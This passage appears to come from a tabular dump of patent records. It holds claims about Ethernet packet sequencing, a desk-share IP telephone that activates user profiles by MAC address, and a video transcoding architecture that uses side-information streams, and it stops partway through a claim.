wherein the management data comprise management data, from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the further sequence, and sends the formed Ethernet packets via the Ethernet connection to the receiving device, and in which the receiving device, after receiving the Ethernet packets, processes these in dependence on the transmitting device which has sent these, preferably separated according to transmitting device. 26. A transmitting device for sending at least one transmittal data block, for example in the form of a sensor or a part of an evaluation device, which
has a transmission buffer for the at least partially and temporarily storing data of the transmittal data block, and an Ethernet interface, and is designed to form a sequence of Ethernet packets from the transmittal data block which respectively comprise management data and a transmittal data sub-block formed from the respective transmittal data block, so that the transmittal data sub-blocks of the Ethernet packets of the sequence comprise the data of the transmittal data block, wherein the management data comprise management data from which is establishable whether one of the Ethernet packets is the last Ethernet packet of the sequence, and to send the Ethernet packets via the Ethernet interface. 27. The transmitting device according to claim 26, which further has a processor and instructions of a computer program upon whose execution the processor of the transmittal data block forms the sequence of Ethernet packets in the transmission buffer. 28. The transmitting device according to claim 26, which has an FPGA connected to the Ethernet interface or at least forming a part of the Ethernet interface, which is programmed such that it forms from the transmittal data block Ethernet packet the management data and the transmittal data sub-blocks for the respective sequence of Ethernet packets. 29. The transmitting device according to claim 26, in which the Ethernet interface has an Ethernet controller, having an internal DMA functionality which is designed such that it can process descriptor lists independently. 30. A receiving device for receiving sequences of the Ethernet packets which are formable by a transmitting device and contain respectively transmittal data sub-blocks of a transmittal data block, having
a storage for storing a transferred transmittal data block, a processor for at least partially processing the transmittal data block stored in the storage, and a receiving portion which is designed for receiving sequences of Ethernet packets having data of the transmittal data block and writing respectively the transmittal data sub-blocks contained in the received Ethernet packets while employing at least a part of the management data in the storage, wherein the receiving portion is further designed such that the receiving portion does not send an interrupt to the processor upon or after the writing of each of the transmittal data sub-blocks. 31. The receiving device according to claim 30, in which the receiving portion is designed such that it emits a receive signal, for example an interrupt, to the processor, preferably emits only if a pre-specified amount of Ethernet packets of the same sequence were received and the transmittal data of the transmittal data sub-blocks therein were written to the storage and/or upon receiving or storing at least one pre-specified error occurs and/or the transmittal data from the useful data block of the last Ethernet packet of the sequence were written to the storage. 32. The receiving device according to claim 30, in which the receiving portion has an FPGA, wherein the receiving portion is designed such and the FPGA is configured or programmed such that by means of the FPGA, while employing the management data, the transmittal data sub-blocks from received Ethernet packets are written to the storage, and that the FPGA preferably after writing the transmittal data sub-blocks of a pre-specified amount of Ethernet packets of the sequence to the storage and/or writing of the last transmittal data sub-block of the sequence, triggers the emitting of a receive signal, for example an interrupt, to the processor. 33. The receiving device according to claim 32, in which the receiving portion has a PHY which is connected to the FPGA via a data connection, wherein the FPGA is further configured or programmed such that it works as an Ethernet controller. 34. The receiving device according to claim 32, in which the FPGA, the processor and the storage are connected via a PCIe network. 35. The receiving device according to claim 32, which comprises several PHY which are connected to the FPGA, and the FPGA is programmed such that transmittal data sub-blocks of Ethernet packets, which were received from a respective one of the PHY, respectively are written to the storage. 36. The receiving device according to claim 30, which also comprises a transmitting device, wherein the Ethernet interface of the transmitting device is given by a portion of the receiving portion which also works as an Ethernet interface of the transmitting device. | 2,400 |
9,191 | 9,191 | 16,452,938 | 2,449 | The present invention relates to a method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, in particular, to a local area network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of: receiving, at the IP telephone, an IP data packet from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to the MAC address in the IP telephone. Further, the invention relates to an IP telephone which is adapted to carry out the method for automatically registering a user in a desk-share environment. | 1. A method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of:
receiving, at the IP telephone, an IP data packet containing a MAC address from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to that MAC address in the IP telephone. 2. The method according to claim 1 wherein the IP telephone periodically receives IP data packets from the terminal device. 3. The method according to claim 1 wherein when in the step of verifying the MAC address, the IP telephone determines that the MAC address does not correspond to the MAC address of the activated user profile and is a new MAC address, then the method further comprises a step of:
checking, whether the new MAC address is among the data in the data base; and
when it is determined that the new MAC address is among the data in the database, activating the user profile assigned to the new MAC address in the IP telephone. 4. The method according to claim 3 wherein the method further comprises a step of activating a default user profile when it is determined that the new MAC address is not among the data in the database. 5. The method according to claim 3 wherein the method further comprises a step of activating the previously activated user profile when it is determined that the new MAC address is not among the data in the database. 6. The method according to claim 3 wherein the method further comprises a step of activating an emergency calls only mode when it is determined that the new MAC address is not among the data in the database. 7. The method according to claim 2 wherein the method further comprises a step of detecting one of a stop of the data traffic received from the first terminal device and a change in the periodically received data packets. 8. The method according claim 7 wherein when a stop of the data traffic received from the first terminal device is detected by the IP telephone, then the IP telephone proceeds according to a preselected option from a number of options selected from the group consisting of activating a default user profile, activating an emergency calls only mode, and maintaining the activated user profile. 9. The method according to claim 1 wherein the communications network is a local area network 10. An IP telephone which is adapted to carry out the method according to claim 1 wherein the IP telephone is adapted to hold a database comprising data of a plurality of desk-share users of a desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the IP telephone comprising:
means for receiving an IP data packet from a first terminal device via the LAN;
means for verifying the MAC address in the IP data packet received from the first terminal device; and
means for activating the user profile assigned to the MAC address in the IP telephone. 11. The IP telephone according to claim 10 wherein the IP telephone is a VoIP telephone. 12. The IP telephone according to claim 10, wherein the IP telephone further comprises means for activating a user profile according to a predetermined time schedule. | The present invention relates to a method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, in particular, to a local area network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of: receiving, at the IP telephone, an IP data packet from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to the MAC address in the IP telephone. Further, the invention relates to an IP telephone which is adapted to carry out the method for automatically registering a user in a desk-share environment.1. A method for automatically registering a user in a desk-share environment comprising a plurality of desks, each desk being equipped with an IP telephone connected to a communication network, wherein the IP telephone holds a data base comprising data of all desk-share users of the desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the method comprising the steps of:
receiving, at the IP telephone, an IP data packet containing a MAC address from a first terminal device via the communication network; verifying the MAC address in the IP data packet received from the first terminal device; and when the MAC address corresponds to a MAC address in the data of the data base, activating the user profile assigned to that MAC address in the IP telephone. 2. The method according to claim 1 wherein the IP telephone periodically receives IP data packets from the terminal device. 3. The method according to claim 1 wherein when in the step of verifying the MAC address, the IP telephone determines that the MAC address does not correspond to the MAC address of the activated user profile and is a new MAC address, then the method further comprises a step of:
checking, whether the new MAC address is among the data in the data base; and
when it is determined that the new MAC address is among the data in the database, activating the user profile assigned to the new MAC address in the IP telephone. 4. The method according to claim 3 wherein the method further comprises a step of activating a default user profile when it is determined that the new MAC address is not among the data in the database. 5. The method according to claim 3 wherein the method further comprises a step of activating the previously activated user profile when it is determined that the new MAC address is not among the data in the database. 6. The method according to claim 3 wherein the method further comprises a step of activating an emergency calls only mode when it is determined that the new MAC address is not among the data in the database. 7. The method according to claim 2 wherein the method further comprises a step of detecting one of a stop of the data traffic received from the first terminal device and a change in the periodically received data packets. 8. The method according claim 7 wherein when a stop of the data traffic received from the first terminal device is detected by the IP telephone, then the IP telephone proceeds according to a preselected option from a number of options selected from the group consisting of activating a default user profile, activating an emergency calls only mode, and maintaining the activated user profile. 9. The method according to claim 1 wherein the communications network is a local area network 10. An IP telephone which is adapted to carry out the method according to claim 1 wherein the IP telephone is adapted to hold a database comprising data of a plurality of desk-share users of a desk-share environment, the data comprising at least a user ID and a MAC address of a terminal device for each user assigned to a user profile, the IP telephone comprising:
means for receiving an IP data packet from a first terminal device via the LAN;
means for verifying the MAC address in the IP data packet received from the first terminal device; and
means for activating the user profile assigned to the MAC address in the IP telephone. 11. The IP telephone according to claim 10 wherein the IP telephone is a VoIP telephone. 12. The IP telephone according to claim 10, wherein the IP telephone further comprises means for activating a user profile according to a predetermined time schedule. | 2,400 |
9,192 | 9,192 | 13,915,499 | 2,486 | A split architecture for encoding a video stream. A source encoder may encode a video content stream to obtain an encoded bitstream and a side information stream. The side information stream includes information characterizing rate and/or distortion estimation functions per block of the video content stream. Also, a different set of estimation functions may be included per coding mode. The encoded bitstream and side information stream may be received by a video transcoder, which transcodes the encoded bitstream to a client-requested picture resolution, according to a client-requested video format and bit rate. The side information stream allows the transcoder to efficient and compactly perform rate control for its output bitstream, which is transmitted to the client device. This split architecture may be especially useful to operators of content delivery networks. | 1. A system comprising:
a memory that stores a collection of video content items, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; one or more video transcoder devices; and a controller, wherein, in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of user devices, the controller is configured to assign an available one of the one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC), wherein each assigned video transcoder device is configured to: receive the encoded video stream and side information stream of the given video content item; and transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 2. The system of claim 1, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 3. The system of claim 2, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given content item. 4. The system of claim 2, wherein the metadata includes rate modeling data per block of the encoded video stream of the given content item. 5. The system of claim 2, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given content item. 6. The system of claim 1, wherein the communication medium is a wireless transmission medium. 7. The system of claim 6, wherein at least one of the one or more video transcoder devices is coupled to or incorporated as part of a base station of a wireless communication network, wherein one or more of the user devices are configured for wireless communication with the base station. 8. The system of claim 1, wherein the controller is configured to assign a first of the one or more video transcoder devices to different ones of the user devices at different times. 9. The system of claim 1, further comprising:
a source encoder configured to encode source video streams to generate respective ones of the content items, wherein each of the one or more video transcoder devices is more power efficient than the source encoder, and/or more space efficient than the source encoder. 10. The system of claim 1, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 11. The system of claim 1, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 12. The system of claim 1, wherein a first of the one or more video transcoder devices is configured to perform said transcoding by:
decoding the encoded video stream to obtain a decoded video stream; scaling the decoded video stream to a target picture resolution of the respective user device, in order to obtain a scaled video stream; and encoding the scaled video stream using the side information and according to the VPC configuration of the respective user device, in order to obtain the respective target encoded video stream. 13. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to encode the scaled video stream. 14. The system of claim 13, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 15. The system of claim 14, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 16. The system of claim 13, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 17. The system of claim 16, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 18. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, update the target picture resolution used by the first video transcoder device to encode the scaled video stream. 19. The system of claim 1, wherein the VPC configuration of each user device includes an identification of one or more of:
a video coding format requested by the user device; and a target picture resolution requested by the user device. 20. The system of claim 1, wherein the VPC configurations of the respective user devices span an M-dimensional configuration space, wherein M is at least two, wherein the M-dimensional configuration space has at least a first dimension corresponding to a choice of video format and a second dimension corresponding to a selection of picture resolution. 21. The system of claim 1, wherein the controller is configured to:
store the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and direct a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 22. A method for delivering video content to user devices, the method comprising:
storing a collection of video content items in a memory, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of remote user devices, assigning an available one of one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC); utilizing each assigned video transcoder device to: receive the encoded video stream and side information stream of the given video content item; transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 23. The method of claim 22, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 24. The method of claim 23, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given video content item. 25. The method of claim 23 wherein the metadata includes rate modeling data per block of the encoded video stream of the given video content item. 26. The method of claim 23, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given video content item. 27. The method of claim 22, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 28. The method of claim 22, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the given video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 29. The method of claim 22, further comprising:
encoding source video streams to generate respective ones of the content items, wherein said encoding the source video stream is performed by a source encoder, wherein each of the video transcoder devices consumes less power than the source encoder, and occupies less space than the source encoder. 30. The method of claim 22, further comprising:
receiving reports from the user device being served by a first of the one or more video transcoder devices, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to perform said transcoding of the encoded video stream. 31. The method of claim 30, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 32. The method of claim 31, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 33. The method of claim 30, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 34. The system of claim 33, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 35. The method of claim 22, further comprising:
receiving reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, updating the target picture resolution used by the first video transcoder device to encode the scaled video stream. 36. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a video coding format requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream conforms to the requested video coding format. 37. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target picture resolution requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has the requested target picture resolution. 38. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target bit rate requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has an average output bit rate approximately equal to the requested target bit rate. 39. The method of claim 22, further comprising:
storing the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and directing a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 40. A video encoder comprising:
digital circuitry configured to perform, for each of a plurality of blocks of the input video stream, operations including: transforming a plurality of prediction residuals that correspond respectively to one or more coding modes in order to obtain one or more respective transform blocks for the one or more respective coding modes; for each coding mode Mk, processing the respective prediction residual and/or the respective transform block for the coding mode Mk to obtain rate modeling data for the coding mode Mk; transmission circuitry configured to transmit a side information stream onto a communication medium, wherein the side information stream includes the rate modeling data for each coding mode and for each block. 41. The video encoder of claim 40, wherein the rate modeling data includes data characterizing a rate estimation function Rk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 42. The video encoder of claim 40, wherein the operations also include:
for each coding mode Mk, generating one or more reconstruction residuals based respectively on one or more quantized versions of the transform block for that coding mode, and generating distortion modeling data for the coding mode based on the one or more reconstruction residuals, wherein the side information stream also includes the distortion modeling data for each coding mode and each block. 43. The video encoder of claim 42, wherein the distortion modeling data includes data characterizing a distortion estimation function Dk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 44. The video encoder of claim 40, wherein the digital circuitry is further configured to generate an encoded video stream that represents an encoded version of the input video stream, wherein the transmission circuitry is configured to transmit the encoded video stream onto the communication medium. 45. The video encoder of claim 44, wherein said generating the encoded video stream includes operating on at least one of the one or more transform blocks. 46. A video encoder comprising:
digital circuitry configured to encode an input video stream to obtain an encoded video stream, wherein said encoding includes generating a side information stream that characterizes properties of the input video stream; and transmission circuitry configured to transmit the encoded video stream and the side information stream. 47. The video encoder of claim 46, wherein the side information stream includes data characterizing rate and/or distortion properties of the input video stream. 48. The video encoder of claim 46, wherein the side information stream includes a stream of candidate motion vectors. 49. A video transcoding system comprising:
a decoder configured to receive and decode a first encoded video stream to obtain a decoded video stream; a scaling unit configured to scale the decoded video stream to a target picture resolution in order to obtain a scaled video stream; an output encoder configured to receive a side information stream associated with the first encoded video stream, and encode the scaled video stream using the side information stream in order to obtain a second encoded video stream. 50. The video transcoding system of claim 49, wherein the first encoded video stream is an encoded version of a source video stream, wherein the side information stream includes metadata that characterizes properties of the source video stream. 51. The video transcoding system of claim 49, wherein the target picture resolution is lower than a picture resolution implicit in the first encoded video stream. 52. The video transcoding system of claim 49, wherein the side information stream includes N rate information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each rate information stream RISk of the N rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 53. The video transcoding system of claim 52, wherein N=2 for a given coded picture of the first encoded video stream, wherein the rate information stream RISC corresponds to an intra coding mode, wherein the rate information stream RIS2 corresponds to an inter coding mode. 54. The video transcoding system of claim 52, wherein each rate information stream RISk characterizes the rate estimation function Rk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 55. The video transcoding system of claim 49, wherein the side information stream includes N distortion information streams corresponding to N respective coding modes, wherein N is greater than or equal to one, wherein each distortion information stream DISk of the N distortion information streams characterizes a corresponding distortion estimation function Dk(q) per block of the first encoded video stream assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 56. The video transcoding system of claim 55, wherein N=2 for a given coded picture of the first encoded video stream, wherein the distortion information stream DIS1 corresponds to an intra coding mode, wherein the distortion information stream DIS2 corresponds to an inter coding mode. 57. The video transcoding system of claim 55, wherein each distortion information stream DISk characterizes the distortion estimation function Dk(q) for each block with a corresponding set of one or more fitting parameters associated with a continuous functional model. 58. The video encoder of claim 49, wherein the output encoder is configured to process the side information stream in order to obtain an aggregate rate estimation function RA(q) for each frame of the scaled video stream, wherein q represents quantization step size. 59. The video encoder of claim 58, wherein the output encoder is configured to further process the side information stream in order to obtain an aggregate distortion estimation function DA(q) for each frame of the scaled video stream. 60. The video transcoding system of claim 49, wherein the side information stream includes one or more candidate motion vectors for each block of the first encoded video stream, wherein the output encoder is configured to perform a fine-resolution motion vector refinement for each block that is restricted to one or more neighborhoods in motion vector space based on the one or more candidate motion vectors. 61. The video transcoding system of claim 49, wherein said decoder is configured to recover a motion vector for each block from the first encoded video stream as part of said decoding the first encoded video stream, wherein the output encoder is configured to perform a motion vector refinement for each block that is restricted to a neighborhood in motion vector space based on the motion vector for the block. 62. The video transcoding system of claim 49, wherein the side information includes one or more candidate motion vectors per block, wherein said encoding the scaled video stream includes selecting a motion vector from a set of vectors including the one or more candidate motion vectors. 63. The video transcoding system of claim 62, wherein the set of vectors also include a decoded motion vector recovered from the first encoded video stream. 64. The video transcoding system of claim 49, further comprising:
transmission circuitry configured to transmit the second encoded video stream to a remote decoder through a communication medium. 65. The video transcoding system of claim 49, wherein the output encoder is configured to receive auxiliary information and inject the auxiliary information into the scaled video stream, wherein the auxiliary information includes one or more of:
branding information of a business entity; advertising information; digital rights management (DRM) information; digital information providing watermark functionality; customized features requested by a content provider, content delivery service provider, customer or user. 66. The video transcoding system of claim 49, wherein at least one of the decoder, the scaling unit and the output encoder is implemented using software configured for execution on an array of parallel processors. 67. The video transcoding system of claim 49, wherein the decoder, the scaling unit, the output encoder are implemented on distinct subsets of processors in an array of parallel processors. | A split architecture for encoding a video stream. A source encoder may encode a video content stream to obtain an encoded bitstream and a side information stream. The side information stream includes information characterizing rate and/or distortion estimation functions per block of the video content stream. Also, a different set of estimation functions may be included per coding mode. The encoded bitstream and side information stream may be received by a video transcoder, which transcodes the encoded bitstream to a client-requested picture resolution, according to a client-requested video format and bit rate. The side information stream allows the transcoder to efficient and compactly perform rate control for its output bitstream, which is transmitted to the client device. This split architecture may be especially useful to operators of content delivery networks.1. A system comprising:
a memory that stores a collection of video content items, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; one or more video transcoder devices; and a controller, wherein, in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of user devices, the controller is configured to assign an available one of the one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC), wherein each assigned video transcoder device is configured to: receive the encoded video stream and side information stream of the given video content item; and transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 2. The system of claim 1, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 3. The system of claim 2, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given content item. 4. The system of claim 2, wherein the metadata includes rate modeling data per block of the encoded video stream of the given content item. 5. The system of claim 2, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given content item. 6. The system of claim 1, wherein the communication medium is a wireless transmission medium. 7. The system of claim 6, wherein at least one of the one or more video transcoder devices is coupled to or incorporated as part of a base station of a wireless communication network, wherein one or more of the user devices are configured for wireless communication with the base station. 8. The system of claim 1, wherein the controller is configured to assign a first of the one or more video transcoder devices to different ones of the user devices at different times. 9. The system of claim 1, further comprising:
a source encoder configured to encode source video streams to generate respective ones of the content items, wherein each of the one or more video transcoder devices is more power efficient than the source encoder, and/or more space efficient than the source encoder. 10. The system of claim 1, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 11. The system of claim 1, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 12. The system of claim 1, wherein a first of the one or more video transcoder devices is configured to perform said transcoding by:
decoding the encoded video stream to obtain a decoded video stream; scaling the decoded video stream to a target picture resolution of the respective user device, in order to obtain a scaled video stream; and encoding the scaled video stream using the side information and according to the VPC configuration of the respective user device, in order to obtain the respective target encoded video stream. 13. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to encode the scaled video stream. 14. The system of claim 13, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 15. The system of claim 14, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 16. The system of claim 13, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 17. The system of claim 16, wherein the controller is configured to decrease or increase the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 18. The system of claim 12, wherein the controller is configured to:
receive reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, update the target picture resolution used by the first video transcoder device to encode the scaled video stream. 19. The system of claim 1, wherein the VPC configuration of each user device includes an identification of one or more of:
a video coding format requested by the user device; and a target picture resolution requested by the user device. 20. The system of claim 1, wherein the VPC configurations of the respective user devices span an M-dimensional configuration space, wherein M is at least two, wherein the M-dimensional configuration space has at least a first dimension corresponding to a choice of video format and a second dimension corresponding to a selection of picture resolution. 21. The system of claim 1, wherein the controller is configured to:
store the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and direct a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 22. A method for delivering video content to user devices, the method comprising:
storing a collection of video content items in a memory, wherein each of the video content items includes a corresponding encoded video stream and corresponding side information stream; in response to each of a plurality of content requests for a given one of the video content items from a respective plurality of remote user devices, assigning an available one of one or more video transcoder devices to serve the respective user device, wherein the user devices have respectively different configurations of video processing capability (VPC); utilizing each assigned video transcoder device to: receive the encoded video stream and side information stream of the given video content item; transcode the encoded video stream using the side information stream and according to the VPC configuration of the respective user device, in order to obtain a respective target encoded video stream; and transmit the respective target encoded video stream to the respective user device through a communication medium. 23. The method of claim 22, wherein the encoded video stream of the given video content item is an encoded version of a given source video stream, wherein the side information stream includes metadata that characterizes properties of the given source video stream. 24. The method of claim 23, wherein the metadata includes one or more candidate motion vectors per block of the encoded video stream of the given video content item. 25. The method of claim 23 wherein the metadata includes rate modeling data per block of the encoded video stream of the given video content item. 26. The method of claim 23, wherein the metadata includes distortion modeling data per block of the encoded video stream of the given video content item. 27. The method of claim 22, wherein the side information stream of each video content item includes one or more rate information streams corresponding to one or more respective coding modes, wherein each rate information stream RISk of the one or more rate information streams characterizes a corresponding rate estimation function Rk(q) per block of the corresponding encoded video stream, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 28. The method of claim 22, wherein the side information stream of each video content item includes one or more distortion information streams corresponding to one or more respective coding modes, wherein each distortion information stream DISk of the one or more distortion information streams characterizes a corresponding distortion function Dk(q) per block of the encoded video stream of the given video content item, assuming block prediction based on the respective coding mode, wherein q is a quantization step size. 29. The method of claim 22, further comprising:
encoding source video streams to generate respective ones of the content items, wherein said encoding the source video stream is performed by a source encoder, wherein each of the video transcoder devices consumes less power than the source encoder, and occupies less space than the source encoder. 30. The method of claim 22, further comprising:
receiving reports from the user device being served by a first of the one or more video transcoder devices, wherein each of the reports includes analytical information from the user device; and in response to each of the reports, update a target bit rate and/or the target picture resolution used by the first video transcoder device to perform said transcoding of the encoded video stream. 31. The method of claim 30, wherein the analytical information includes information about quality of a link between the first video transcoder device and the user device. 32. The method of claim 31, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about link quality indicates that the link quality has decreased or increased, respectively. 33. The method of claim 30, wherein the analytical information includes information about the quality of video recovered from the respective target encoded video stream transmitted by the first video transcoder device. 34. The system of claim 33, further comprising:
decreasing or increasing the target bit rate and/or the target picture resolution used by the first video transcoder device when the information about video quality indicates that the video quality has decreased or increased, respectively. 35. The method of claim 22, further comprising:
receiving reports from the user device being served by the first video transcoder device, wherein each of the reports includes a corresponding update to the VPC configuration of the user device; and in response to each of the reports, updating the target picture resolution used by the first video transcoder device to encode the scaled video stream. 36. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a video coding format requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream conforms to the requested video coding format. 37. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target picture resolution requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has the requested target picture resolution. 38. The method of claim 22, wherein the VPC configuration of each user device includes an identification of a target bit rate requested by the user device, wherein said transcoding of the encoded video stream is performed so that the respective target encoded video stream has an average output bit rate approximately equal to the requested target bit rate. 39. The method of claim 22, further comprising:
storing the target encoded video stream generated by a given one of the one or more video transcoder devices that has been assigned to serve a first of the user devices; and directing a transmission of the stored target encoded video stream to a second user device in response to detecting that the second user device has a same or similar VPC configuration as the first user device. 40. A video encoder comprising:
digital circuitry configured to perform, for each of a plurality of blocks of the input video stream, operations including: transforming a plurality of prediction residuals that correspond respectively to one or more coding modes in order to obtain one or more respective transform blocks for the one or more respective coding modes; for each coding mode Mk, processing the respective prediction residual and/or the respective transform block for the coding mode Mk to obtain rate modeling data for the coding mode Mk; transmission circuitry configured to transmit a side information stream onto a communication medium, wherein the side information stream includes the rate modeling data for each coding mode and for each block. 41. The video encoder of claim 40, wherein the rate modeling data includes data characterizing a rate estimation function Rk(q) for at least one of the one or more coding modes, wherein q represents quantization step size. 42. The video encoder of claim 40, wherein the operations also include:
